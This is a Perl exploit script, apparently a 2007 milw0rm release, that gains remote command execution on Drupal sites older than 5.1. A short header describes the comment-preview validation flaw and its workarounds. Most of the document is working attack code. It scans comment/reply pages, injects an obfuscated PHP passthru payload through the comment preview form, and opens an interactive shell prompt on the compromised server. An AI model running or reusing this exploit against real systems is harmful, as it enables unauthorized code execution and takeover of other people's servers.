#!/usr/bin/perl # # $Id: milw0rm_drupalv5.pl,v 0.2 2007/02/15 13:40:29 str0ke Exp $ # # milw0rm_drupalv5.pl - Drupal < 5.1 Remote Command Execution Exploit # Copyright (c) 2007 str0ke <str0ke[!]milw0rm.com> # # Description # ----------- # Previews on comments were not passed through normal form validation routines, # enabling users with the 'post comments' permission and access to more than one # input filter to execute arbitrary code. By default, anonymous and authenticated # users have access to only one input format. # Immediate workarounds include: disabling the comment module, revoking the 'post # comments' permission for all users or limiting access to one input format. # Versions affected # ----------------- # - Drupal 5.x versions before Drupal 5.1 # # [02/15/2007] The exploit has been fixed. /str0ke # use strict; use LWP::UserAgent; my $host = shift || &usage; my $dir = shift || "/drupal"; my $proxy = shift; my $command; my $conn = LWP::UserAgent->new(); $conn -> proxy("http", "http://".$proxy."/") unless !$proxy; sub usage() { print "[?] Drupal < 5.1 Remote Command Execution Exploit\n"; print "[?] Copyright (c) 2007 str0ke <str0ke[!]milw0rm.com>\n"; print "[?] usage: perl $0 [host] [directory] [proxy]\n"; print " [host] (ex. www.milw0rm.com)\n"; print " [directory] (ex. /drupal)\n"; print " [proxy] (ex.\n"; exit; } sub exploit() { my $i = $_[0]; my $command = $_[1] || 'ls -l'; my $cmd = 'echo start_er;'.$command.';'.'echo end_er'; my $byte = join('.', map { $_ = 'chr('.$_.')' } unpack('C*', $cmd)); my $req = HTTP::Request->new(POST => "http://" . $host . $dir . "/?q=comment/reply/" . $i); $req -> content_type('application/x-www-form-urlencoded'); $req -> content('subject=My daddy beats me&comment=<?passthru('.$byte.');?>&format=2&form_id=comment_form&op=Preview comment'); my $content = $conn->request($req); if ($content->content =~ m/start_er(.*?)end_er/ms) { my $out = $1; if ($out) { print "$out\n"; } else { print "[-] Exploit Failed...\n"; exit; } } } for my $i ( 1 .. 400 ) { my $output = $conn -> get("http://" . $host . $dir . "/?q=comment/reply/" . $i); if($output -> is_success) { if($output -> content =~ /add new comment/) { print "[+] found comment/reply: $i\n"; &exploit($i); while() { print "str0kin-drupal\$ "; chomp($command = <STDIN>); exit unless $command; &exploit($i, $command); } exit; } } } print "[-] Exploit Failed...\n"; # milw0rm.com [2007-02-15]
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